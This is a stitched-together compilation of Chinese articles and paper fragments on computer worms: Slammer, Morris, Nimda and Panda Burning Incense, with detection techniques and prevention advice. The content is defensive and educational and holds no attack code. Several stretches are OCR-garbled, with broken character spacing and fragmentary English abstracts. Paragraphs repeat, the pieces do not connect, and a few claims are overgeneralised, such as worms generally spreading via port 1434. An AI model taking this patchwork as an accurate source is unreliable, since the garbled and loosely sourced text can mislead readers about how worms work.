蠕虫病毒的特征与防治.doc
蠕虫病毒有什么危害如何杀
蠕虫病毒有什么危害如何杀时间:2013-01-15 19:26来源:作者:xp系统下载点击:170次电脑的蠕虫病毒是什么,会给电脑系统造成什么危害呢?“2003蠕虫王”(Killer2003)感染该蠕虫病毒后网络带宽被大量占用,导致网络瘫痪,该蠕虫是利用SQL SERVER 2000 的解析端口1434的缓冲区溢出漏洞,对其网络进行攻击。
由于“2003蠕虫王”具有极强的传播能力,目前在亚洲、美洲、澳大利亚等地迅速传播,已经造成了全球性的网络灾害。
由于1月25日正值周末,其造成的恶果首先表现为公用互联网络的瘫痪,预计在今后几天继续呈迅速蔓延之势。
小编建议您使用360免费杀毒进行查杀,然后再根据查杀情况进行相应措施。
蠕虫病毒传播过程2003蠕虫病毒是一个极为罕见的具有极其短小病毒体却具有极强传播性的蠕虫病毒。
该蠕虫利用Microsoft SQL Server 2000缓冲区溢出漏洞进行传播,详细传播过程如下:该病毒入侵未受保护的机器后,取得三个Win32 API地址,GetTickCount、socket、sendto,接着病毒使用GetTickCount获得一个随机数,进入一个死循环继续传播。
在该循环中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有255台可能存在机器。
易受攻击的机器类型为所有安装有Microsoft SQL Server 2000的NT系列服务器,包括WinNT/Win2000/WinXP等。
所幸该蠕虫并未感染或者传播文件形式病毒体,纯粹在内存中进行蔓延。
病毒体内存在字符串“h.dllhel32hkernQhounthickChGet”、“Qh32.dhws2_f”、“etQhsockf”、“toQhsend”。
该病毒利用的安全漏洞于2002年七月被发现并在随后的MS SQL Server2000补丁包中得到修正。
蠕虫病毒
蠕虫病毒1、社会背景最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。
蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过网络连接)。
近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。
这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
2、经济损失3、现象这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
4、原理它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。
最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。
蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过网络连接)。
5、传播途径蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。
网络的发展也使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。
所以从这个意义上说,蠕虫也是一种病毒!网络蠕虫病毒,作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽视。
与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对象。
蠕虫病毒的特点与防范技术
蠕虫病毒的特点与防范技术发表时间:2017-03-16T14:06:02.187Z 来源:《科技中国》2016年12期作者:罗昕瑜[导读] 文章针对计算机蠕虫病毒相关问题展开了详细地研究与探讨,阐述了网络安全管理具体途径。
成都树德中学(光华校区) 610091摘要:文章针对计算机蠕虫病毒相关问题展开了详细地研究与探讨,阐述了网络安全管理具体途径,希望为计算机的安全运行提供有价值的依据。
关键词:计算机;蠕虫病毒;防御在科学技术快速发展的背景下,计算机蠕虫病毒在攻击与防御方面也同样有所发展,所以,计算机蠕虫病毒也将具有明显的智能化与复杂化特点,严重影响甚至是危害网络。
为此,必须要采取相应的手段对计算机蠕虫病毒进行防御。
一、计算机蠕虫病毒概述所谓的计算机蠕虫,并不需要由计算机的使用者干预,就能够实现运行的独立性程序,对网络当中的漏洞进行获取,进而掌握计算机部分或者是全部的控制权以实现传播。
而计算机病毒主要是在计算机程序当中插入能够对其功能或者是数据造成严重破坏的指令或程序代码。
由此可见,计算机蠕虫与病毒的传染行以及复制功能十分明显,而在特性方面存在相似性,所以,使得两者区分难度较大。
目前,计算机蠕虫、木马程序以及计算机病毒界限逐渐模糊,且三者之间互相渗透。
其中,更多病毒都对蠕虫技术进行了运用,而同时,蠕虫病毒也采用了病毒与木马技术。
通过上述分析与研究表明,计算机蠕虫病毒集计算机蠕虫、病毒与木马技术为一体,在使用者不干预的情况下就能够运行,并且在扫描过程中获得网络漏洞,进而对计算机控制权予以复制及传播,针对已被感染计算机内部安装后门,亦或是使用恶意代码对计算机的系统与重要信息带来严重破坏。
二、计算机蠕虫病毒的有效防御(一)防火墙技术的运用可以合理地运用网络防火墙软件或者是单机防火墙软件,不允许使用服务器端口以外的端口,这样一来,就能够从根源上切断计算机蠕虫病毒传输与通信的途径。
与此同时,需要针对包含计算机蠕虫病毒特征的报文进行过滤,对已经感染的主机访问保护网络进行及时屏蔽。
蠕虫病毒
虫子悠悠爬——深入了解网络蠕虫作者:小金一、果园里的虫害老皮特坐在电脑前写着邮件,愁眉不展,连敲回车也弄出很大的声响。
“该死的虫子!我用了几种农药也杀不死它们!……它们总是躲着,从这棵树爬到那棵树!这些可恶的蠕虫!现有的农药不管用!你们快点赶过来,带上新的杀虫剂,要快!资金不是问题,重要的是我的果园!看在果实就快要成熟的份上,快点!上帝啊!”原来,老皮特的果园正在经历一场蠕虫危机,他今天和农业虫害防治的人员取得了联系,正在发电子邮件让他们马上过来。
提到蠕虫,大家都不会陌生,这些自然界中的低等生物以农作物为食,给人类带来经济损失,但是,如果我说计算机中也有这样一种名为“蠕虫”的东西存在,同样也给人类带来严重经济损失,你也许会觉得天方夜谭,虫子怎么会爬进计算机呢?可这偏偏就是事实!当然,能爬进计算机的“蠕虫”就不是自然界中那种动物了,它们是一种特殊的程序、一堆具有自我复制能力的代码,它们像蠕虫一样漫无目的乱爬,给计算机带来危害。
1988年11月2日,世界上第一个蠕虫正式诞生。
美国康乃尔大学一年级研究生莫里斯为了求证计算机程序能否在不同的计算机之间自我复制传播,他写了一段试验程序,为了程序能顺利进入另一台计算机,他写了一段破解用户口令的代码。
11月2日早上5点,这段被称为“Worm”(蠕虫)的程序开始了它的旅行(图1),它果然没有辜负莫里斯的期望:它爬进了几千台电脑,让它们死机,直接造成了经济损失9600万美元的记录。
从此,“蠕虫”这个名词传开了,莫里斯也许不知道,他在证明这个结论的同时,也打开了潘多拉魔盒……二、爬进机器的虫子过了一会儿,老皮特收到两封邮件,一封是虫害防治人员的回复,他们说马上就会过来;另一封就有点奇怪,是个陌生的地址发来的,内容更奇怪,只有一行字:Hey,is that your photo?也许是哪个孩子的恶作剧吧,老皮特随手把邮件删除了。
老皮特做梦也不会想到,他用来管理果园的的计算机里已经来了一个不受欢迎的客人……自1988年第一个蠕虫显示出它的威力以来,越来越多的人加入了蠕虫制作阵营,他们用这种途径来证明自己的能力,或者实现一些特殊目的,于是多种多样的蠕虫诞生了,可是不管蠕虫的“行为方式”(它们进入计算机后要做的事情)有多少种,其“传播方式”却仅仅有屈指可数的几种:电子邮件、网页代码、社会工程学、系统漏洞。
蠕虫病毒的分析与防范
蠕虫病毒的分析与防范作者:朱慧爽来源:《科学与财富》2019年第06期摘要:蠕虫病毒给网络环境带来了巨大的灾难。
日益严重的蠕虫问题,不仅给用户造成了巨大的损失,而且严重威胁着国家的信息安全。
蠕虫的检测和防范成为当前网络安全研究的热点。
关键词:蠕虫;病毒;网络安全1.蠕虫病毒简介蠕虫病毒与一般病毒不同。
蠕虫病毒不需要将其自身附着到宿主程序,是一种独立的智能程序。
它利用网络进行传播并能够自我复制,爆发时消耗大量的系统资源,使其他程序运行减慢甚至停止,最后导致系统和网络瘫痪。
“熊猫烧香”就是一个典型的感染型蠕虫病毒,其感染行为主要包括:复制自身到系统目录;创建启动项;在各分区根目录生成病毒副本;修改“显示所有文件和文件夹”设置;尝试关闭注册表编辑器、系统配置实用程序、Windows任务管理器、杀毒软件等。
2.蠕虫的检测技术(1)基于蠕虫特征码的检测技术首先将一些蠕虫恶意代码的特征值收集起来,然后逐个创建每一个特征值的特征码规则库。
检测时,利用在特征码和特征码规则库中的具体规则与要检测的网络行为进行匹配,如果存在异常就会匹配成功,对于这样的异常应当给出警告或者拒绝访问。
这样的检测方式有一定的限制,如果有些蠕虫病毒在规则库中没有匹配成功,就无法检测出蠕虫。
(2)基于蠕虫行为特征的检测技术Bakos提出了一种蠕虫行为特征检测技术,利用了ICMP目标主机不可达报文来判断识辨蠕虫的随机扫描行为,并通过信息收集点来收集网络中由路由器产生的这种不可达报文信息,然后统计消息的个数,并和给定的阈值进行比较,以此判断蠕虫是否有传播行为。
但是这种方法中如果路由器个数较少,那么收集到的报文信息数就会较少,会影响到判断的准确性(3)基于贝叶斯的检测技术在网络传播蠕虫的时候,蠕虫会先向网络中有漏洞的目标主机发送大量连接请求数据包,用这种方法就可以判断出目标主机是否开机,还能判断出这些目标主机是否存在漏洞,由此判断是否会被感染。
3.蠕虫病毒的防范3.1单位用户防范措施(1)提高网络管理员的安全意识和管理水平。
实训7-2蠕虫病毒的查杀与防范.
实训7-2蠕虫病毒的查杀与防范引言蠕虫病毒是一种恶意软件,通过网络传播并感染计算机系统。
蠕虫病毒可以自动复制和传播自己,对网络安全造成严重威胁。
在本文中,我们将介绍蠕虫病毒的特征和传播方式,并提供一些常用的查杀和防范方法。
蠕虫病毒的特征蠕虫病毒与其他恶意软件不同之处在于其具备自我复制和传播的能力。
蠕虫病毒可以通过网络传播,并在感染新主机后再次复制并传播自己。
这种自我复制和传播的能力使得蠕虫病毒具有迅速传播和蔓延的潜力。
另一个蠕虫病毒的特征是其破坏性。
蠕虫病毒可以危害计算机系统的正常功能,并可能导致数据损失、系统崩溃等严重后果。
一些蠕虫病毒还具备隐藏性,可以在感染主机之后长时间潜伏而不被察觉。
蠕虫病毒的传播方式蠕虫病毒可以通过多种方式传播。
以下是一些常见的传播途径:1.电子邮件附件:蠕虫病毒可以通过电子邮件附件传播。
当用户打开蠕虫病毒的电子邮件附件时,病毒将被激活并感染用户的计算机系统。
2.可执行文件:蠕虫病毒可以附加在可执行文件中,当用户运行该可执行文件时,病毒将开始感染用户的计算机系统。
3.共享文件夹:蠕虫病毒可以通过共享文件夹传播。
当用户访问感染的共享文件夹时,病毒将利用网络传播自己到其他计算机系统。
4.操作系统漏洞:蠕虫病毒可以利用操作系统的漏洞来传播自己。
一旦蠕虫病毒感染了具有漏洞的计算机系统,它可以利用该漏洞来感染其他主机和系统。
蠕虫病毒的查杀方法及时发现和查杀蠕虫病毒对于保护计算机系统的安全至关重要。
以下是一些常用的蠕虫病毒查杀方法:1.使用杀毒软件:杀毒软件是查杀蠕虫病毒的最常见和有效的方法之一。
杀毒软件可以及时检测和清除计算机系统中的病毒,并提供实时保护。
2.更新操作系统:定期更新操作系统是防范蠕虫病毒传播的重要措施。
操作系统提供的更新补丁通常包含了对已知漏洞的修复,减少了蠕虫病毒感染的机会。
3.禁用自动运行:蠕虫病毒通常利用自动运行功能来感染计算机系统。
禁用自动运行功能可以阻止蠕虫病毒在用户运行可执行文件时自动启动。
谈网络蠕虫病毒的全面防范
2 网络 蠕 虫 病毒 实例 分 析
目前 , 已经 知 晓 的 产 生 严 重 影 响
比如近 几年危 害很大 的 “ 尼姆达 ”病
毒 就 是 一 种 蠕 虫 病 毒 。 这 一 病 毒 利 用 了微软 W i d ws操作 系统 的漏 洞 , n o 计 算机 感染这 一病毒之 后 ,会不 断地 自动拨 号上 网 ,并利 用文件 中 的地 址 信 息或者 网络共 享进 行传播 ,最终 破 坏 用户 的大 部分 重要数 据 。 蠕 虫是一 种通过 网络 传播 的恶性 病毒 ,它具 有病毒 的一般 特性 ,如 传 播性 、隐蔽 性 、破 坏性 等 ,同时具 有 自己的一些 特征 ,如不 利用文件 寄生 、 对 网络 造成 拒绝服 务 、以及 与黑客技
速 普 及 的今 天 ,蠕 虫病毒 给 用 户造 成 不 少的 损 失 。 该 文主 要 从 企业 和 个 人 两个 角度 阐 述 一 下应 该 如何 做 好 网络 蠕 虫病毒 的 全‘ 面
防范 。
关键 词 :蠕 虫 ;病毒 ;防 范
Di c s t e s u s h Co r h n v Pr e t o of t n t r wo m viu mp e e si e ev n i n he e wo k r r s
t e e wok h n t r wo m vr s r i . u
Ke W ors: wom, vrs pe e t n y d r i , rv n i u o
网络蠕 虫病 毒 可分 为 主 动传 播 (
术相 结合 等。在 产生 的破坏性 上 ,蠕
虫病 毒 也不 是 普 通 病毒 所 能 比拟 的 , 网络 的飞速 发展 ,使 得蠕 虫可 以在短 时间 内蔓延 整个 网络 ,造 成 网络瘫痪 。 根据 被攻 击者 的情况 可 以将蠕 虫
蠕虫病毒的一般处置方案
蠕虫病毒的一般处置方案随着计算机技术的飞速发展,各种病毒也越来越多地出现在我们的互联网世界中。
尤其是蠕虫病毒,由于它的自我复制和传播能力极强,一旦扩散开来,对计算机网络和用户带来的破坏是非常严重的。
为了保护计算机网络和用户的数据安全,我们需要了解蠕虫病毒的一般处置方案。
什么是蠕虫病毒蠕虫病毒是一种利用网络空间进行传播并自我复制的恶意代码,其主要特点是在网络上迅速传播、危害大、范围广。
蠕虫病毒通过利用网络上的漏洞或者弱点进行攻击,从而与其他主机生成新的感染行为,不断扩散,给计算机和网络带来极大的危害。
常见的蠕虫病毒有蠕虫、爆破蠕虫、邮件蠕虫等。
蠕虫病毒的预防与防治注意网络安全作为计算机用户,我们首先应该注意网络安全,并采取一定的预防措施。
可以查看操作系统补丁以及安全更新,并及时安装;安装杀毒软件,并保持及时更新杀毒软件的病毒库文件;禁止使用弱口令以及禁止共享敏感文件;只下载和运行可靠的应用程序;打开和接收电子邮件附件应慎重,不要轻易打开未知来源的附件;使用智能型防火墙来过滤网络流量等等。
这些安全措施可以最大程度地减少蠕虫病毒的传播和危害。
安装杀毒软件杀毒软件是防治计算机中常见恶意代码的重要手段。
我们可以根据操作系统的环境、硬件配置、性能特征选择适合自己的杀毒软件,然后及时更新病毒库文件,保证杀毒软件可以识别新出现的病毒,并及时进行拦截和处置。
及时修补漏洞很多蠕虫病毒利用系统中的软件漏洞进行攻击,在开放端口中搜索额外的受感染目标。
因此,及时修补漏洞是很重要的,可以有效预防蠕虫病毒的感染和扩散。
操作系统或软件提供商会在出现漏洞时发布相应的安全更新,安装修补程序是修补漏洞的主要方式,因此我们需要定期检查漏洞并进行修补。
摆脱蠕虫病毒的方法如果我们的计算机被蠕虫病毒感染,应当及时采取措施进行摆脱。
第一,隔离感染机器,及时关闭网络连接。
在某些情况下需要停止运行与网络有关的程序。
第二,运行杀毒软件,对病毒进行扫描和清除。
如何防范蠕虫病毒
如何防范蠕虫病毒蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,那么如何防范蠕虫病毒呢?接下来由店铺为大家推荐防范蠕虫病毒的方法,希望对你有所帮助!蠕虫和普通病毒区别:对于防毒杀毒长久以来都是计算机使用者比较头疼的问题,很多人都存在以上的疑问和误区。
针对近年来,病毒开始由传统形向网络蠕虫和隐蔽的木马病毒发展,笔者这篇文章就以这两个祸害开刀,和大家一步一步谈谈从杀到防搞定病毒。
随着我国宽带爆炸式的发展,蠕虫病毒引起的危害开始快速的显现!蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),快速的自身复制并通过网络感染,以及和黑客技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造成网络瘫痪。
相信以前的冲击波、震荡波大家一定还没忘记吧。
1、蠕虫和普通病毒区别2、传播特点蠕虫一般都是通过变态的速度复制自身并在互联网环境下进行传播,目标是互联网内的所有计算机。
这样一来局域网内的共享文件夹,电子邮件,网络中的恶意网页,大量安装了存在漏洞操作系统的服务器就都成为蠕虫传播的良好途径,使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!这其中通过操作系统漏洞或者通过IE漏洞攻击的方式最为常见。
3、蠕虫的预防解决蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里的漏洞或者说是缺陷,我们分为2种:软件的和人为的。
软件上的缺陷,如系统漏洞,微软IE和outlook的自动执行漏洞等等,需要大家经常更新系统补丁或者更换新版本软件。
而人为的缺陷,主要是指的是计算机用户的疏忽。
例如,当收到QQ好友发来的照片、游戏的时候大多数人都会报着好奇去点击的,从而被感染上了病毒。
个人用户对蠕虫病毒的防范措施:通过上述的分析,我们了解蠕虫的特点和传播的途径,因此防范需要注意以下几点:1、选择合适的杀毒软件杀毒软件必须提供内存实时监控和邮件实时监控以及网页实时监控!国产软件无论是在功能和反应速度以及病毒更新频率上都做的不错,相对国外的反病毒软件他们对于像QQ这类国产病毒具有明显优势,同时消耗系统资源也比较少,大家可以放心使用。
计算机网络蠕虫病毒及防治
() 1 利用 软件 系统 的 漏 洞 主 动进 行 攻 击 。此类
病 毒攻击 不仅 仅 是操 作 系 统 的 漏 洞 , 时 也攻 击应 同
用软件 的漏洞 。比如 : QL蠕 虫 王 病毒 则 是利 用 了 S S ev r QL S re 系统 远 程 堆 栈 缓 冲 区溢 出漏 洞 进 行 大
蒋卫 国 , 寿祥 魏
( 国石 油 兰 州 石 化 公 司 石 油 化工 研 究 院 , 中 甘肃 兰 州 70 6 ) 30 0
摘 要 : 分析蠕 虫病 毒 的特 点和传播 方 式的基础 上 , 企业 用 户和 个人 用户 两个方 面探 讨 蠕 虫病 在 从
毒的 一些 防 范措 施 。 关键 词 : 虫; 毒 ; 蠕 病 传播模 式 ; 漏洞 ; 范措 施 防
1 2 蠕 虫 病 毒 的 传 播 方 式 .
“ 冲击 波 ” “ 、震荡 波 ” 等 , 破坏 力 越 来越 强 , 企 等 其 给 业 和个人 带来 了 巨大的 经济损 失 。下面 先概述蠕 虫
病毒 的一 些特性 , 从 中找到 蠕虫 病毒 的防治 方法 。 再
蠕虫 采用 的 自动人 侵技术 , 有很强 的智 能性 , 没
模 式 出现 。比如 , 们 可 以把 利 用 邮件 进 行 自动传 我
播 也作 为一种 模式 。这 种 模 式 的描 述 为 : 由邮 件地
维普资讯
第 5期
蒋 卫 国等 : 算 机 网络 蠕虫 病毒及 防治 计
来越 高 !
浏览 时触 发 。
程 主机的 系统控 制 权 。然后 , 毒 会 利 用 自身 的复 病 制功 能将蠕 虫程 序复制 到新 主机并激 活 。复制 过程 也 有很多种 方法 , 以利 用 系统本 身的程 序实 现 , 可 也 可 以用蠕 虫 自带 的程 序 实 现 , 制 过程 实 际 上 就是 复
网络蠕虫的研究与防范
防 治技 术 。
【 关键词 】 网络蠕 虫; 网络安全 ; 能结构 ; 虫防范 功 蠕
0 引 言
行。
网络蠕虫 蠕虫病毒 ) ( 是一种常见 的计算 机病毒 , 利用网络进行 3 蠕虫的行 为特征和功能结构 复制和传播 , 传染途径是通过网络和电子 邮件。蠕虫病毒既具有计算 31 蠕 虫 的行 为特 征 分 析 . 机病毒的一般特 性 . 又具有 自己的一些特征 . 如不需要将 其 自身附着 通过对冲击 波等蠕虫 的整个工作流程的分析 。 可以归纳得到它们 到宿主程序 . 利用网络和计 算机的漏 洞进行 攻击 和传播等 随着 网络 的一些共 同行 为特征 : 的飞速发展 . 蠕虫病毒正逐渐成为网络和计 算机安全的最大威胁 。因 () 1 利用系统 和网络服务的漏洞进行 主动攻击 : 从搜 索漏 洞到利 此 . 网络蠕虫的研 究和防治成为信 息安全领域 的一个重要课题日 对 。 用搜索结 果攻击 系统 , 到复制副本 , 整个流程全 由蠕 虫 自身 主动完成 。 () 2 造成 网络拥 塞 . 降低系统性 能 : 蠕虫入侵到计算 机系统之后 , 1 网络蠕虫与计算机 病毒的比较 大量的扫描和攻 击线程会耗费系统资源 . 同时也 因产生大量附加的 网 根据蠕虫和计算机病毒的定义可知 . 蠕虫利用计算机和 网络 的漏 络数据流量而导 致网络拥塞 洞主动进行攻击和传播 . 而一般计算 机病 毒必须以其它程序文件为 载 () 3 产生安全 隐患: 大部分蠕虫会搜集 、 扩散 、 暴露系统敏感信息 , 体, 而且只有当用户运行病毒所依 附的文件 时 。 病毒程序才会被激活 , 并在系统中留下后 门 然后感染其所在的系统。 蠕虫和普通计算机病 毒的主要 差别 如表 1 所 () 4 反复性 : 如果 没有修补计算机系统 漏洞 . 即使 清除了蠕虫 , 当 示。 计算机接入到网络还是会被重新感染 。 表 1 网络蠕虫与计算 机病毒 的区别 32 蠕虫的功能结构模型 . 计算机病毒 网络蠕虫 根据上述分 析 . 以总结 出蠕虫 的功能结构模 型. 可 各模块的功能 和用途如下 : 存在形式 寄生 独立程序 () 1 自启动模块 : 保证每次开机蠕虫都会 自动运行 , 一般注册成为 复制机制 插入到宿主程序 中 自身拷贝 服务或在注册表 的 R n目录下添加启动项等 u 运行方式 宿 主程序运行 主动攻击 () 2 扫描模块 : 主要是漏洞扫描 , 通过某种算法寻找下一台要传染
电脑病毒的种类和防范措施
电脑病毒的种类和防范措施在互联网时代,电脑病毒对个人和组织的信息安全构成了严重威胁。
了解电脑病毒的种类以及采取有效的防范措施是保护计算机系统和数据安全的关键。
本文将介绍电脑病毒的种类,并提供一些常见的防范措施。
一、电脑病毒的种类1. 蠕虫病毒(Worms Virus)蠕虫病毒是一种能够自我复制并传播的恶意软件。
它可以在网络中自动传播,通过利用漏洞和弱密码来感染目标计算机。
蠕虫病毒会消耗系统资源,导致计算机变慢甚至崩溃。
2. 木马病毒(Trojan Horse Virus)木马病毒隐藏在看似正常的程序中,一旦用户运行该程序,木马病毒就会开始破坏计算机系统。
木马病毒可以用于窃取个人信息、监视用户活动或远程控制目标计算机。
3. 病毒(Virus)病毒是最常见也是最具破坏性的电脑病毒类型之一。
与其他病毒相似,计算机病毒通过感染可执行文件或系统脚本来传播。
一旦感染,病毒就会开始破坏文件、程序或整个系统。
4. 间谍软件(Spyware)间谍软件主要用于监视用户的上网活动并收集个人信息,如访问记录、键盘输入等。
间谍软件通常通过恶意软件捆绑在免费软件或可下载的内容中传播。
5. 广告软件(Adware)广告软件常常嵌入免费软件中,当用户安装这些软件时,广告软件就会自动显示广告内容。
虽然广告软件通常不会对系统造成直接损害,但它会对用户的网络浏览体验造成干扰。
二、防范措施1. 安装强大的杀毒软件选择一款经过信誉认证的杀毒软件,及时更新病毒库,并定期进行全盘扫描。
杀毒软件可以帮助检测和清除电脑中的病毒,并提供实时保护。
2. 更新操作系统和软件及时安装和更新操作系统和常用软件的补丁和安全更新。
这些更新可以修复已知的漏洞,提高计算机的安全性。
3. 谨慎打开邮件附件和下载文件不要打开来自陌生发件人或不信任的邮件附件,也不要下载未知来源的文件。
这些文件很可能包含病毒或恶意软件。
4. 使用防火墙防火墙可以监控系统与外部网络之间的通信,并阻止未经授权的访问。
蠕虫病毒基本分类防治方法特别注意计算机病毒
蠕虫病毒基本分类防治方法特别注意计算机病毒 - 蠕虫病毒知识大全2011.04.06 24310 次浏览分开、旅行∙∙目录1基本分类2防治方法3特别注意4异同对比基本分类蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它(蠕虫病毒)的某些部分到其他的计算机系统中(通常是经过网络连接)。
请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,它是一种独立智能程序。
有两种类型的蠕虫:主机蠕虫与网络蠕虫。
主计算机蠕虫完全包含(侵占)在它们运行的计算机中,并且使用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔",蠕虫病毒一般是通过1434端口漏洞传播。
蠕虫比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种,去年春天流行“熊猫烧香”以及其变种也是蠕虫病毒。
这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
防治方法蠕虫病毒的一般防治方法是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件。
蠕虫是怎么发作的?如何采取有效措施防范蠕虫?一、利用操作系统和应用程序的漏洞主动进行攻击此类病毒主要是“红色代码”和“尼姆亚”,以及至今依然肆虐的”求职信”等。
由于IE浏览器的漏洞(IFRAME EXECCOMMAND),使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件,只要不去打开附件,病毒不会有危害。
“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播,SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。
二、传播方式多样如“尼姆亚”病毒和”求职信”病毒,可利用的传播途径包括文件、电子邮件、Web服务器、网络共享等等。
谈谈蠕虫病毒的危害与防范
【 摘
要 】蠕 虫是一种寄 生在 网络的 恶性病毒 , : 随着互联 网的高速发展 而壮大 , 威胁 着网络的安全. 文首先分析蠕 虫病 本
毒 的 破 坏 力与 目前 的发 展 趋 势 . 然后 讨 论 了企 业与 个人 二 者 在 防 范蠕 虫病 毒 时 应 采 取 的 措 施 。
【 关键词】蠕 虫病毒; 危害; : 病毒 病毒防 范
We 如“ 病毒和 “ 求职 在产生 的破坏程度 上 . 蠕虫病 毒也大大超 出普 通病毒. 1 表 是普 邮件 、 b服务器 以及网络共享等 等. 尼 姆达” 信” 病毒。 通病毒与蠕虫病乔的对 比。 3 蠕虫病毒制作技术的革新 。许多新病毒是利用当前最新 . 普通病毒 蠕虫病毒 的 编 程语 言 与 编 程 技 术 实 现 的 , 于 修 改 以产 生 新 的变 种 , 而 易 从 存在形式 寄存文件 独立程序
维普资讯
福 建 电
脑
20 0 6年第 6期
谈谈蠕虫病毒 的危 害与 防范
苏葆光 魏泽臻 .
f. 江 万里 学 院 基础 学 院 计 算 机 浙 江 宁 波 3 5 0 1浙 11 1 2 九 江 q 院信 息科 学与技 术 学 院 基 础教 育 教研 室 江 西 九 江 3 2 0 ) . - 30 5
3 蠕 虫 病 毒 的 防 范 .
蠕虫和普通病毒不 同的一个特征是 蠕虫病 毒往 往能够利用 掘洞 我们 把漏洞分 为软件J 的瞩洞和人为上的漏洞。 二 软件上的 漏洞 , 如远 程 溢 出 , 软 I 微 E和 o t o 漏 洞 等 等. 人 为 上 的 漏 u ok的 l 而 洞. 主瑶是指的是计算机用户的疏忽 , 这就是所谓的社会工程学 (oi nier g 。 sc l g ei ) 当收到一封邮件带着病毒的“ aE n n 闭 求职信” 邮件 时候 . 多数 人 都 会 报 着 好 奇 去点 击 的 。 对 于 企 业 用 户 来 说 , 大 威
计算机蠕虫病毒特点是什么
计算机蠕虫病毒特点是什么对我们电脑危害非常大的蠕虫病毒,都有些神特点呢?下面由店铺给你做出详细的蠕虫病毒特点介绍!希望对你有帮助!计算机蠕虫病毒特点介绍一:病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。
蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身的某些部分到其他的计算机系统中(通常是经过网络连接)。
蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。
请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序有两种类型的蠕虫:主机蠕虫与网络蠕虫。
主计算机蠕虫完全包含在它们运行的计算机中,并且使用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔",蠕虫病毒一般是通过1434端口漏洞传播。
计算机蠕虫病毒特点介绍二:蠕虫病毒是一种常见的计算机病毒。
它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。
最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。
蠕虫病毒是自包含的程序(或是一套程序),它能传播自身功能的拷贝或自身的某些部分到其他的计算机系统中(通常是经过网络连接)。
防范措施蠕虫病毒的一般防治方法是:使用具有实时监控功能的杀毒软件,防范邮件蠕虫的最好办法,就是提高自己的安全意识,不要轻易打开带有附件的电子邮件。
另外,可以启用瑞星杀毒软件的“邮件发送监控”和“邮件接收监控”功能,也可以提高自己对病毒邮件的防护能力。
计算机蠕虫病毒特点介绍三:蠕虫病毒计算机病毒种传染机理利用网络进行复制传播传染途径通网络电邮件比近几危害尼姆达病毒蠕虫病毒种病毒利用微软视窗操作系统漏洞计算机染病毒断自拨号网并利用文件址信息或者网络共享进行传播终破坏用户部重要数据蠕虫病毒般防治:使用具实监控功能杀毒软件并且注意要轻易打熟悉邮件附件相关阅读:计算机病毒免杀技术和新特征免杀是指:对病毒的处理,使之躲过杀毒软件查杀的一种技术。
蠕虫病毒的分析与防范
